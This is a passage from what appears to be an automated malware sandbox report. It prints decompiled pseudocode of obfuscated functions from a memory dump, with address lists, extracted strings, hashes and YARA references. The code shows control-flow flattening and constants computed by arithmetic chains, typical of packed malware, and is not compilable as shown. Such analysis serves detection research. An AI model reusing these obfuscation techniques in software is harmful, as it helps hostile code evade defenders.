				_v596 = _v596 ^ 0x79ed7009;
				_v660 = 0x66e5e2;
				_v660 = _v660 * 0x66;
				_v660 = _v660 | 0x758dac75;
				_v660 = _v660 + 0xffff8a46;
				_v660 = _v660 ^ 0x7df7ed38;
				_t355 = _v608;
				do {
					while(_t325 != 0x753c325) {
						if(_t325 == 0x96bd97c) {
							_t309 = _v568;
							_t326 = _v572;
							_v560 = _t309;
							_v552 = _t309;
							_v544 = _t309;
							_v536 = _t309;
							_v532 = _v620;
							_v564 = _t326;
							_v556 = _t326;
							_v548 = _t326;
							_v540 = _t326;
							E1001DEFF(_v668, _v676, _t326, _v600,  &_v564, _t355);
							_t363 = _t363 + 0x14;
							_t324 =  !=  ? 1 : _t324;
							_t325 = 0xad84d58;
							continue;
						} else {
							if(_t325 == 0xa89774c) {
								_t314 = E1001CCFE(0, _v584, _v632, _v684, _v692, _v696, _v580,  &_v524, _v640, _v648, _t325, _v656, _v680);
								_t355 = _t314;
								_t363 = _t363 + 0x30;
								if(_t314 != 0xffffffff) {
									_t325 = 0x96bd97c;
									continue;
								}
							} else {
								if(_t325 == 0xad84d58) {
									E100074B2(_v612, _v608, _v596, _t355, _v660);
								} else {
									if(_t325 == 0xc1c0ea0) {
										E1001C3E5(_v616, _v672,  &_v572);
										_t325 = 0xc226587;
										continue;
									} else {
										if(_t325 == 0xc226587) {
											_v572 = _v572 - E1001E737(_t325);
											_t325 = 0xe38305d;
											asm("sbb [esp+0x94], edx");
											continue;
										} else {
											if(_t325 != 0xe38305d) {
												goto L15;
											} else {
												_push(_v652);
												_push(_v604);
												_push(_v588);
												E100049CE( *0x10025208 + 0x230,  *0x10025208 + 0x1c, E1000416C(_v624, 0x100017d4), _v576, _v664, _v624, _v628, _v644);
												_t363 = _t363 + 0x28;
												E1000B952(_v636, _t320, _v592, _v688);
												_t325 = 0xa89774c;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t324;
					}
					_t325 = 0xc1c0ea0;
					L15:
				} while (_t325 != 0xa2863de);
				goto L18;
			}

0x10021972
0x10021981
0x1002198a
0x1002198e
0x10021990
0x10021995
0x1002199a
0x100219a2
0x100219aa
0x100219b9
0x100219bc
0x100219c0
0x100219c5
0x100219cd
0x100219d5
0x100219dd
0x100219e5
0x100219ed
0x100219f5
0x100219fd
0x10021a05
0x10021a0d
0x10021a15
0x10021a1d
0x10021a22
0x10021a2a
0x10021a32
0x10021a3f
0x10021a47
0x10021a4c
0x10021a52
0x10021a5a
0x10021a62
0x10021a67
0x10021a68
0x10021a6c
0x10021a74
0x10021a7c
0x10021a87
0x10021a92
0x10021a9d
0x10021aaa
0x10021aae
0x10021ab6
0x10021abe
0x10021ac6
0x10021acb
0x10021ad3
0x10021ade
0x10021ae9
0x10021af4
0x10021afc
0x10021b01
0x10021b0e
0x10021b12
0x10021b1a
0x10021b28
0x10021b2c
0x10021b31
0x10021b39
0x10021b41
0x10021b49
0x10021b50
0x10021b58
0x10021b60
0x10021b68
0x10021b70
0x10021b78
0x10021b80
0x10021b88
0x10021b90
0x10021b98
0x10021b9d
0x10021ba2
0x10021baa
0x10021bb2
0x10021bc7
0x10021bca
0x10021bd1
0x10021bdc
0x10021be9
0x10021bed
0x10021bf5
0x10021bfd
0x10021c05
0x10021c0d
0x10021c15
0x10021c1a
0x10021c1f
0x10021c27
0x10021c32
0x10021c3d
0x10021c48
0x10021c50
0x10021c60
0x10021c64
0x10021c6c
0x10021c78
0x10021c7b
0x10021c7f
0x10021c87
0x10021c8f
0x10021c97
0x10021c9f
0x10021ca7
0x10021caf
0x10021cb7
0x10021cbf
0x10021cc4
0x10021ccc
0x10021cd4
0x10021cdc
0x10021ce1
0x10021ce9
0x10021cf1
0x10021cf9
0x10021d01
0x10021d09
0x10021d11
0x10021d1e
0x10021d22
0x10021d2a
0x10021d32
0x10021d3a
0x10021d3f
0x10021d47
0x10021d4f
0x10021d57
0x10021d5f
0x10021d6c
0x10021d70
0x10021d7d
0x10021d85
0x10021d8d
0x10021d91
0x10021d91
0x10021d9f
0x10021ee9
0x10021ef0
0x10021ef7
0x10021efe
0x10021f05
0x10021f0c
0x10021f18
0x10021f2b
0x10021f37
0x10021f3e
0x10021f45
0x10021f50
0x10021f57
0x10021f5d
0x10021f60
0x00000000
0x10021da5
0x10021dab
0x10021ecf
0x10021ed4
0x10021ed6
0x10021edc
0x10021ee2
0x00000000
0x10021ee2
0x10021db1
0x10021db7
0x10021f91
0x10021dbd
0x10021dc3
0x10021e86
0x10021e8c
0x00000000
0x10021dc9
0x10021dcf
0x10021e5e
0x10021e65
0x10021e6a
0x00000000
0x10021dd5
0x10021ddb
0x00000000
0x10021de1
0x10021de1
0x10021dea
0x10021dee
0x10021e2f
0x10021e34
0x10021e48
0x10021e4f
0x00000000
0x10021e4f
0x10021ddb
0x10021dcf
0x10021dc3
0x10021db7
0x10021dab
0x10021f9c
0x10021fa5
0x10021fa5
0x10021f6a
0x10021f6f
0x10021f6f
0x00000000

Strings

Y^n, xrefs: 10021AF4
LPV, xrefs: 10021C05
py, xrefs: 10021D57
f, xrefs: 10021D5F
Bq, xrefs: 10021A62
qE, xrefs: 10021B41
MY!, xrefs: 10021CAF
UY, xrefs: 10021A7C
v6, xrefs: 10021AD3

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: py$Bq$LPV$MY!$UY$Y^n$qE$v6$f
API String ID: 0-2824559296
Opcode ID: 2e88b09af40b295d0c6c5a426c15c9f433857d56e1b3e2e641431173bb824134
Instruction ID: fa44840a556dad4364a56f792fe194473b2de999d138942b3dc41fc6fa49a2ab
Opcode Fuzzy Hash: 2e88b09af40b295d0c6c5a426c15c9f433857d56e1b3e2e641431173bb824134
Instruction Fuzzy Hash: 8DE11DB5408380DFD3A8CF65D58AA4BFBE1FBD4754F60891DF29A86260D7B08949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 100065BD, Relevance: 10.6, Strings: 8, Instructions: 627
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E100065BD(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				unsigned int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				void* _t656;
				void* _t721;
				void* _t725;
				intOrPtr _t741;
				void* _t749;
				intOrPtr _t755;
				void* _t818;
				signed int _t834;
				void* _t835;
				signed int _t837;
				signed int _t838;
				signed int _t839;
				signed int _t840;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				void* _t854;
				void* _t857;
				void* _t858;
				void* _t859;
				void* _t865;

				_t755 = __ecx;
				_push(_a24);
				_v180 = __ecx;
				_push(_a20);
				_push(_a16);
				_push(0x20);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(_t656);
				_v116 = 0xddeab2;
				_t859 = _t858 + 0x20;
				_v116 = _v116 + 0xe7f9;
				_v116 = _v116 ^ 0x945a441d;
				_t857 = 0;
				_v116 = _v116 ^ 0x948496b6;
				_t749 = 0x1343767;
				_v292 = 0x77b4f7;
				_v292 = _v292 >> 4;
				_t837 = 0x1a;
				_v292 = _v292 * 0x30;
				_v292 = _v292 + 0xffff3ccd;
				_v292 = _v292 ^ 0x01665b9d;
				_v256 = 0xd95604;
				_v256 = _v256 << 8;
				_v256 = _v256 * 0x2b;
				_v256 = _v256 + 0xffff1eb5;
				_v256 = _v256 ^ 0x8171cab5;
				_v184 = 0xd9a81b;
				_v184 = _v184 ^ 0xb2a85dc4;
				_v184 = _v184 ^ 0xde4bb3f3;
				_v184 = _v184 + 0xffff3a08;
				_v184 = _v184 ^ 0x6c398034;
				_v228 = 0x2e5a5f;
				_t42 =  &_v228; // 0x2e5a5f
				_v228 =  *_t42 * 0x44;
				_v228 = _v228 + 0x53e2;
				_v228 = _v228 | 0xcbf809ae;
				_v228 = _v228 ^ 0xcff85dbe;
				_v252 = 0x408d0d;
				_v252 = _v252 * 0x4d;
				_v252 = _v252 + 0xfffff032;
				_v252 = _v252 / _t837;
				_v252 = _v252 ^ 0x00bf2af7;
				_v144 = 0xf314ec;
				_v144 = _v144 ^ 0xf687a99a;
				_v144 = _v144 + 0x1e3;
				_v144 = _v144 ^ 0xf674bf59;
				_v136 = 0x89a481;
				_v136 = _v136 | 0x2892f6e9;
				_v136 = _v136 << 5;
				_v136 = _v136 ^ 0x137edd20;
				_v76 = 0xc650cb;
				_v76 = _v76 ^ 0x8a3e6ab5;
				_v76 = _v76 ^ 0x8af83a7e;
				_v196 = 0x5844d5;
				_t838 = 0x12;
				_v196 = _v196 * 0x57;
				_v196 = _v196 | 0x0ec3bd9e;
				_v196 = _v196 >> 8;
				_v196 = _v196 ^ 0x001ffffd;
				_v44 = 0x72d485;
				_v44 = _v44 / _t838;
				_v44 = _v44 ^ 0x00066123;
				_v188 = 0xf1932a;
				_v188 = _v188 + 0x55e1;
				_v188 = _v188 << 0x10;
				_v188 = _v188 | 0xd4783c77;
				_v188 = _v188 ^ 0xfd7b3c77;
				_v108 = 0x954c49;
				_t839 = 0x66;
				_v108 = _v108 * 0x77;
				_v108 = _v108 ^ 0x456ead8c;
				_v148 = 0xb72ddc;
				_v148 = _v148 * 0x57;
				_v148 = _v148 | 0x09bb780f;
				_v148 = _v148 ^ 0x3ff9b9bf;
				_v176 = 0x839499;
				_v176 = _v176 / _t839;
				_v176 = _v176 | 0x7808c9cb;
				_v176 = _v176 ^ 0x780a45ef;
				_v240 = 0xa38887;
				_t840 = 0x75;
				_v240 = _v240 * 0x7d;
				_v240 = _v240 * 0x38;
				_v240 = _v240 << 8;
				_v240 = _v240 ^ 0x9d231cae;
				_v36 = 0xa1c396;
				_v36 = _v36 | 0x7d70d2d5;
				_v36 = _v36 ^ 0x7df7ba81;
				_v80 = 0x80de04;
				_v80 = _v80 / _t840;
				_v80 = _v80 ^ 0x0004db87;
				_v48 = 0x99db2a;
				_v48 = _v48 ^ 0x7d5563a1;
				_v48 = _v48 ^ 0x7dc01eec;
				_v296 = 0x3261ba;
				_t841 = 0x70;
				_v296 = _v296 / _t841;
				_v296 = _v296 + 0xffff1148;
				_v296 = _v296 << 9;
				_v296 = _v296 ^ 0xff0c4f3b;
				_v64 = 0x4b401;
				_v64 = _v64 + 0xffff28cc;
				_v64 = _v64 ^ 0x00021d26;
				_v40 = 0xabbb33;
				_v40 = _v40 + 0x5c6f;
				_v40 = _v40 ^ 0x00a95fe8;
				_v72 = 0xbc724d;
				_v72 = _v72 + 0x9261;
				_v72 = _v72 ^ 0x00b07597;
				_v100 = 0x32c8da;
				_t842 = 0x6d;
				_v100 = _v100 / _t842;
				_v100 = _v100 ^ 0x000614f5;
				_v104 = 0x5fe17a;
				_v104 = _v104 * 0xb;
				_v104 = _v104 ^ 0x041e441f;
				_v28 = 0xce8697;
				_v28 = _v28 >> 0xd;
				_v28 = _v28 ^ 0x0005b926;
				_v276 = 0x7801a7;
				_v276 = _v276 | 0xa913df87;
				_v276 = _v276 << 2;
				_v276 = _v276 * 0x1e;
				_v276 = _v276 ^ 0x721b04a3;
				_v172 = 0x650801;
				_v172 = _v172 + 0x60ff;
				_v172 = _v172 >> 0xf;
				_v172 = _v172 ^ 0x000e8618;
				_v284 = 0xab0d15;
				_v284 = _v284 << 4;
				_v284 = _v284 + 0xffff09fa;
				_t843 = 0x74;
				_v284 = _v284 / _t843;
				_v284 = _v284 ^ 0x001e7577;
				_v264 = 0xd939af;
				_v264 = _v264 << 2;
				_t844 = 0x38;
				_v264 = _v264 * 0x7a;
				_v264 = _v264 << 3;
				_v264 = _v264 ^ 0xf0a20bbd;
				_v140 = 0xbea039;
				_v140 = _v140 / _t844;
				_v140 = _v140 >> 0xf;
				_v140 = _v140 ^ 0x000834ee;
				_v224 = 0xb74e60;
				_v224 = _v224 + 0xffffc55b;
				_v224 = _v224 << 0xe;
				_t845 = 3;
				_v224 = _v224 / _t845;
				_v224 = _v224 ^ 0x41a272e1;
				_v56 = 0xefd775;
				_t846 = 0x5c;
				_v56 = _v56 / _t846;
				_v56 = _v56 ^ 0x000d4564;
				_v164 = 0x652e8;
				_v164 = _v164 ^ 0xea1e70ec;
				_v164 = _v164 + 0xffff6f1f;
				_v164 = _v164 ^ 0xea12821f;
				_v248 = 0x90b3c3;
				_t847 = 0x71;
				_v248 = _v248 / _t847;
				_v248 = _v248 ^ 0xffde7005;
				_v248 = _v248 << 5;
				_v248 = _v248 ^ 0xfbec1573;
				_v216 = 0x74ad5f;
				_v216 = _v216 | 0xc6cbc9e2;
				_v216 = _v216 + 0xffff75cf;
				_v216 = _v216 ^ 0x4e0b0544;
				_v216 = _v216 ^ 0x88f94f72;
				_v96 = 0x4da3e3;
				_v96 = _v96 + 0xffff8f9e;
				_v96 = _v96 ^ 0x0046be37;
				_v200 = 0xaeee2a;
				_v200 = _v200 << 7;
				_v200 = _v200 | 0x4b05b2e0;
				_t848 = 0x5e;
				_v200 = _v200 / _t848;
				_v200 = _v200 ^ 0x0103e86c;
				_v156 = 0xedb9d9;
				_v156 = _v156 | 0x9ba22f34;
				_t849 = 0x6b;
				_v156 = _v156 / _t849;
				_v156 = _v156 ^ 0x0176b9fb;
				_v124 = 0xf45a69;
				_v124 = _v124 | 0x0ad254ec;
				_t850 = 0x64;
				_v124 = _v124 / _t850;
				_v124 = _v124 ^ 0x001e4a48;
				_v32 = 0x12fdc2;
				_v32 = _v32 ^ 0x7cd5e7fc;
				_v32 = _v32 ^ 0x7cce289e;
				_v272 = 0x29cd60;
				_v272 = _v272 << 8;
				_v272 = _v272 + 0x8713;
				_v272 = _v272 >> 8;
				_v272 = _v272 ^ 0x00288277;
				_v132 = 0xb7b791;
				_v132 = _v132 << 7;
				_v132 = _v132 + 0xffff031c;
				_v132 = _v132 ^ 0x5bd159fd;
				_v192 = 0x8fd13;
				_v192 = _v192 | 0x3836f127;
				_v192 = _v192 >> 0xb;
				_t834 = 0x73;
				_t851 = 0x28;
				_v192 = _v192 * 0x77;
				_v192 = _v192 ^ 0x034acda7;
				_v280 = 0xd4f4ca;
				_v280 = _v280 ^ 0x01d42e6c;
				_v280 = _v280 ^ 0x0c3df54a;
				_v280 = _v280 + 0xffff9f1a;
				_v280 = _v280 ^ 0x0d30a16c;
				_v236 = 0x6382af;
				_v236 = _v236 | 0xc122695c;
				_v236 = _v236 ^ 0x614ffb3a;
				_v236 = _v236 << 5;
				_v236 = _v236 ^ 0x05876f6d;
				_v84 = 0x6a508;
				_v84 = _v84 + 0xfffff650;
				_v84 = _v84 ^ 0x00033d64;
				_v152 = 0x65db74;
				_v152 = _v152 * 0x48;
				_v152 = _v152 >> 0xc;
				_v152 = _v152 ^ 0x000cda75;
				_v244 = 0x881f73;
				_v244 = _v244 + 0xffff8928;
				_v244 = _v244 ^ 0x3cd280dd;
				_v244 = _v244 / _t834;
				_v244 = _v244 ^ 0x0083ea92;
				_v160 = 0x878a06;
				_v160 = _v160 / _t851;
				_v160 = _v160 * 0x73;
				_v160 = _v160 ^ 0x01851dd1;
				_v204 = 0x4a3112;
				_v204 = _v204 * 0x6d;
				_v204 = _v204 ^ 0x3f3d7c7b;
				_v204 = _v204 ^ 0xa363353b;
				_v204 = _v204 ^ 0x83cefbed;
				_v212 = 0x114c00;
				_v212 = _v212 >> 0x10;
				_v212 = _v212 + 0x959c;
				_v212 = _v212 + 0xc158;
				_v212 = _v212 ^ 0x0009c358;
				_v220 = 0x1b125c;
				_v220 = _v220 ^ 0x78231b1b;
				_t852 = 0x4c;
				_v220 = _v220 * 0x1b;
				_v220 = _v220 ^ 0x6309bbc4;
				_v220 = _v220 ^ 0xceec0aad;
				_v128 = 0xf5a826;
				_v128 = _v128 << 8;
				_v128 = _v128 / _t852;
				_v128 = _v128 ^ 0x0338c3fb;
				_v52 = 0xe398ec;
				_v52 = _v52 | 0x547af24f;
				_v52 = _v52 ^ 0x54fd1a5c;
				_v60 = 0x69c05f;
				_v60 = _v60 + 0xffffcf4e;
				_v60 = _v60 ^ 0x00680b51;
				_v68 = 0x51f1e3;
				_v68 = _v68 + 0xffff1479;
				_v68 = _v68 ^ 0x005493c8;
				_v92 = 0x6f9bfe;
				_v92 = _v92 + 0x4762;
				_v92 = _v92 ^ 0x0065908d;
				_v260 = 0x9f865d;
				_t853 = 0x46;
				_v260 = _v260 * 0x50;
				_v260 = _v260 + 0xffff88ec;
				_v260 = _v260 << 5;
				_v260 = _v260 ^ 0x3b3b0e80;
				_v268 = 0xd6732c;
				_v268 = _v268 | 0x5711e2a2;
				_v268 = _v268 + 0xffff8858;
				_v268 = _v268 << 1;
				_v268 = _v268 ^ 0xafab5319;
				_v168 = 0x1f2a41;
				_v168 = _v168 | 0x20e075f4;
				_v168 = _v168 >> 1;
				_v168 = _v168 ^ 0x107b4559;
				_v232 = 0x91595c;
				_v232 = _v232 * 0x4e;
				_v232 = _v232 * 0x6b;
				_v232 = _v232 << 0xc;
				_v232 = _v232 ^ 0xb417240c;
				_v88 = 0x923475;
				_v88 = _v88 * 0x1d;
				_v88 = _v88 ^ 0x10833257;
				_v288 = 0x569fdd;
				_v288 = _v288 * 0x32;
				_v288 = _v288 | 0xdb6aa93e;
				_v288 = _v288 / _t853;
				_v288 = _v288 ^ 0x032e7209;
				_v208 = 0x329b7a;
				_v208 = _v208 >> 0xa;
				_v208 = _v208 * 0x7c;
				_v208 = _v208 / _t834;
				_v208 = _v208 ^ 0x00084199;
				_v112 = 0xc3f1bf;
				_v112 = _v112 * 0x12;
				_v112 = _v112 * 0x3c;
				_t835 = 0xe635cb1;
				_v112 = _v112 ^ 0x3aa81245;
				_t854 = 0xcb5596d;
				_v120 = 0x91fd1f;
				_v120 = _v120 << 1;
				_v120 = _v120 + 0x1151;
				_v120 = _v120 ^ 0x012b5182;
				while(1) {
					L1:
					_t721 = 0xb3a26a1;
					while(1) {
						_t818 = 0xf51cd3f;
						do {
							while(1) {
								L3:
								_t865 = _t749 - 0xa05123a;
								if(_t865 > 0) {
									break;
								}
								if(_t865 == 0) {
									E1000B8B4(_v24, _v92, _v260, _v268, _v168);
									_t749 = 0x84e47ed;
									goto L11;
								} else {
									if(_t749 == 0x1343767) {
										_t749 = 0x45c32a6;
										continue;
									} else {
										if(_t749 == 0x45c32a6) {
											_push(_v240);
											_push(_v176);
											_push(_v148);
											_t725 = E1000416C(_v108, 0x10001000);
											_push(_v296);
											_push(_v48);
											_push(_v80);
											E1001E1AC(_v64,  &_v20, _v116, _t725, _v40, _v72, E1000416C(_v36, 0x10001040));
											_t749 =  ==  ? 0x56f3c82 : 0x9171ad2;
											E1000B952(_v100, _t725, _v104, _v28);
											E1000B952(_v276, _t726, _v172, _v284);
											_t859 = _t859 + 0x3c;
											_t835 = 0xe635cb1;
											goto L15;
										} else {
											if(_t749 == 0x56f3c82) {
												_push(_v56);
												_push(_v224);
												_push(_v140);
												E10004881( &_v12,  &_v8, E1000416C(_v264, 0x10001020), _v164, _v248, _v216, _v96, _v264, _v256, _v20, _v200);
												_t859 = _t859 + 0x30;
												_t749 =  ==  ? 0x61e7ae6 : _t835;
												E1000B952(_v156, _t732, _v124, _v32);
												L15:
												_t854 = 0xcb5596d;
												L26:
												_t755 = _v180;
												_t721 = 0xb3a26a1;
												_t818 = 0xf51cd3f;
												goto L27;
											} else {
												if(_t749 == 0x61e7ae6) {
													_push(_t755);
													_t741 = E100134E7(_t755, _v12);
													_t755 = _v180;
													_t859 = _t859 + 0xc;
													_v16 = _t741;
													_t818 = 0xf51cd3f;
													_t749 =  !=  ? 0xf51cd3f : _t835;
													_t721 = 0xb3a26a1;
													continue;
												} else {
													if(_t749 != 0x84e47ed) {
														goto L27;
													} else {
														E100088FC(_v232, _v88, _v288, _v208, _v16);
														_t749 = _t835;
														L11:
														_t859 = _t859 + 0xc;
														L12:
														_t755 = _v180;
														goto L1;
													}
												}
											}
										}
									}
								}
								L30:
								return _t857;
							}
							if(_t749 == _t721) {
								E1002310B(_v196, _v128, _t755, _v52, _v60, _v68, _v24, 0x20);
								_t859 = _t859 + 0x18;
								_t749 = 0xa05123a;
								_t857 =  ==  ? 1 : _t857;
								goto L26;
							} else {
								if(_t749 == _t854) {
									E1000C49E(_v24, _v204, _v136, _a24, _v212, _v220, _a16);
									_t859 = _t859 + 0x14;
									_t755 = _v180;
									_t721 = 0xb3a26a1;
									_t749 =  ==  ? 0xb3a26a1 : 0xa05123a;
									_t818 = 0xf51cd3f;
									goto L3;
								} else {
									if(_t749 == _t835) {
										E1000C1CB(_v112, _v20, _v188, _v120);
									} else {
										if(_t749 != _t818) {
											goto L27;
										} else {
											E1002250A( &_v24, _v20, _v228, _v236, _v84, _v12, _v152, _v244, _v160, _v252, _v16);
											_t859 = _t859 + 0x28;
											_t749 =  ==  ? _t854 : 0x84e47ed;
											goto L12;
										}
									}
								}
							}
							goto L30;
							L27:
						} while (_t749 != 0x9171ad2);
						goto L30;
					}
				}
			}

0x100065bd
0x100065c7
0x100065ce
0x100065d5
0x100065dc
0x100065e3
0x100065e5
0x100065ec
0x100065f3
0x100065f4
0x100065f5
0x100065fa
0x10006605
0x10006608
0x10006615
0x10006620
0x10006622
0x1000662d
0x10006632
0x1000663a
0x10006646
0x10006649
0x1000664d
0x10006655
0x1000665d
0x10006665
0x1000666f
0x10006673
0x1000667b
0x10006683
0x1000668e
0x10006699
0x100066a4
0x100066af
0x100066ba
0x100066c2
0x100066c7
0x100066cb
0x100066d3
0x100066db
0x100066e3
0x100066f0
0x100066f4
0x10006704
0x10006708
0x10006710
0x1000671b
0x10006726
0x10006731
0x1000673c
0x10006747
0x10006752
0x1000675a
0x10006765
0x10006770
0x1000677b
0x10006786
0x10006793
0x10006794
0x10006798
0x100067a0
0x100067a5
0x100067ad
0x100067c1
0x100067c8
0x100067d3
0x100067de
0x100067eb
0x100067f3
0x100067fe
0x10006809
0x1000681e
0x10006821
0x10006828
0x10006833
0x10006846
0x1000684d
0x10006858
0x10006863
0x10006879
0x10006880
0x1000688b
0x10006896
0x100068a3
0x100068a6
0x100068af
0x100068b3
0x100068b8
0x100068c0
0x100068cb
0x100068d6
0x100068e1
0x100068f7
0x100068fe
0x10006909
0x10006914
0x1000691f
0x1000692a
0x10006936
0x1000693b
0x10006941
0x10006949
0x1000694e
0x10006956
0x10006961
0x1000696c
0x10006977
0x10006982
0x1000698d
0x10006998
0x100069a3
0x100069ae
0x100069b9
0x100069cb
0x100069ce
0x100069d5
0x100069e0
0x100069f3
0x100069fa
0x10006a05
0x10006a10
0x10006a18
0x10006a23
0x10006a2b
0x10006a33
0x10006a3d
0x10006a43
0x10006a4b
0x10006a56
0x10006a61
0x10006a69
0x10006a74
0x10006a7c
0x10006a81
0x10006a8f
0x10006a94
0x10006a9a
0x10006aa2
0x10006aaa
0x10006ab4
0x10006ab7
0x10006abb
0x10006ac0
0x10006ac8
0x10006ade
0x10006ae5
0x10006aed
0x10006af8
0x10006b00
0x10006b08
0x10006b11
0x10006b16
0x10006b1c
0x10006b24
0x10006b36
0x10006b3b
0x10006b44
0x10006b4f
0x10006b5a
0x10006b65
0x10006b70
0x10006b7b
0x10006b87
0x10006b8c
0x10006b92
0x10006b9a
0x10006b9f
0x10006ba7
0x10006baf
0x10006bb7
0x10006bbf
0x10006bc7
0x10006bcf
0x10006bda
0x10006be5
0x10006bf0
0x10006bf8
0x10006bfd
0x10006c09
0x10006c0c
0x10006c10
0x10006c18
0x10006c25
0x10006c39
0x10006c3e
0x10006c47
0x10006c52
0x10006c5d
0x10006c6f
0x10006c74
0x10006c7d
0x10006c88
0x10006c93
0x10006c9e
0x10006ca9
0x10006cb1
0x10006cb6
0x10006cbe
0x10006cc3
0x10006ccb
0x10006cd6
0x10006cde
0x10006ce9
0x10006cf4
0x10006cff
0x10006d0a
0x10006d1a
0x10006d1d
0x10006d1e
0x10006d22
0x10006d2a
0x10006d32
0x10006d3a
0x10006d42
0x10006d4a
0x10006d52
0x10006d5a
0x10006d62
0x10006d6a
0x10006d6f
0x10006d77
0x10006d82
0x10006d8d
0x10006d98
0x10006dab
0x10006db2
0x10006dba
0x10006dc5
0x10006dcd
0x10006dd5
0x10006de5
0x10006de9
0x10006df1
0x10006e05
0x10006e14
0x10006e1b
0x10006e26
0x10006e33
0x10006e37
0x10006e3f
0x10006e47
0x10006e4f
0x10006e57
0x10006e5e
0x10006e66
0x10006e6e
0x10006e76
0x10006e7e
0x10006e8d
0x10006e90
0x10006e94
0x10006e9c
0x10006ea4
0x10006eaf
0x10006ec2
0x10006ec9
0x10006ed4
0x10006edf
0x10006eea
0x10006ef5
0x10006f00
0x10006f0b
0x10006f16
0x10006f21
0x10006f2c
0x10006f37
0x10006f42
0x10006f4d
0x10006f58
0x10006f65
0x10006f66
0x10006f6a
0x10006f72
0x10006f77
0x10006f7f
0x10006f87
0x10006f8f
0x10006f97
0x10006f9b
0x10006fa3
0x10006fae
0x10006fb9
0x10006fc0
0x10006fcb
0x10006fd8
0x10006fe1
0x10006fe5
0x10006fea
0x10006ff2
0x10007005
0x1000700c
0x10007017
0x10007024
0x10007028
0x10007038
0x1000703c
0x10007044
0x1000704c
0x10007056
0x10007060
0x10007064
0x1000706c
0x1000707f
0x1000708e
0x10007095
0x1000709a
0x100070a5
0x100070aa
0x100070b5
0x100070bc
0x100070c7
0x100070d2
0x100070d2
0x100070d2
0x100070d7
0x100070d7
0x100070dc
0x100070dc
0x100070dc
0x100070dc
0x100070e2
0x00000000
0x00000000
0x100070e8
0x10007335
0x1000733a
0x00000000
0x100070ee
0x100070f4
0x1000730e
0x00000000
0x100070fa
0x10007100
0x1000723d
0x10007246
0x1000724d
0x1000725b
0x1000726a
0x1000726e
0x10007275
0x100072b2
0x100072d5
0x100072e6
0x100072fc
0x10007301
0x10007304
0x00000000
0x10007106
0x1000710c
0x1000719e
0x100071aa
0x100071ae
0x100071f8
0x100071fd
0x1000721b
0x1000722c
0x10007233
0x10007233
0x10007463
0x10007463
0x1000746a
0x1000746f
0x00000000
0x10007112
0x10007118
0x10007169
0x10007172
0x10007177
0x1000717e
0x10007183
0x1000718c
0x10007191
0x10007194
0x00000000
0x1000711a
0x10007120
0x00000000
0x10007126
0x10007140
0x10007145
0x10007147
0x10007147
0x1000714a
0x1000714a
0x00000000
0x1000714a
0x10007120
0x10007118
0x1000710c
0x10007100
0x100070f4
0x100074a7
0x100074b1
0x100074b1
0x10007346
0x10007445
0x10007456
0x10007459
0x10007460
0x00000000
0x1000734c
0x1000734e
0x100073ec
0x100073f3
0x10007404
0x1000740b
0x10007410
0x100070d7
0x00000000
0x10007350
0x10007352
0x1000749e
0x10007358
0x1000735a
0x00000000
0x10007360
0x100073a1
0x100073a8
0x100073b9
0x00000000
0x100073b9
0x1000735a
0x10007352
0x1000734e
0x00000000
0x10007474
0x10007474
0x00000000
0x10007480
0x100070d7

Strings

o\, xrefs: 10006982
bG, xrefs: 10006F42
{|=?, xrefs: 10006E37
_Z., xrefs: 100066C2
dE, xrefs: 10006B44
z_, xrefs: 100069E0
Ex, xrefs: 1000688B
U, xrefs: 100067DE

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: _Z.$bG$dE$o\$z_${|=?$Ex$U
API String ID: 0-1970148798
Opcode ID: b09e5f25146450119320f2bff210b93828eb5ce831c89c131e7a9fc3fb2d7ea9
Instruction ID: acbbf4b6dd5e512d59545efb65361e2f0fea4c836b01aacb2aca08787bc1c276
Opcode Fuzzy Hash: b09e5f25146450119320f2bff210b93828eb5ce831c89c131e7a9fc3fb2d7ea9
Instruction Fuzzy Hash: D572FE715083808BE379CF65C88AB8FBBE2FBC4354F108A1DE6D986260D7B58559CF42

Uniqueness

Uniqueness Score: -1.00%

Function 100057E6, Relevance: 10.4, Strings: 8, Instructions: 389
COMMONCrypto

Download Yara Rule

C-Code - Quality: 60%

			E100057E6() {
				char _v520;
				char _v1040;
				char _v1560;
				void* _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				intOrPtr _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
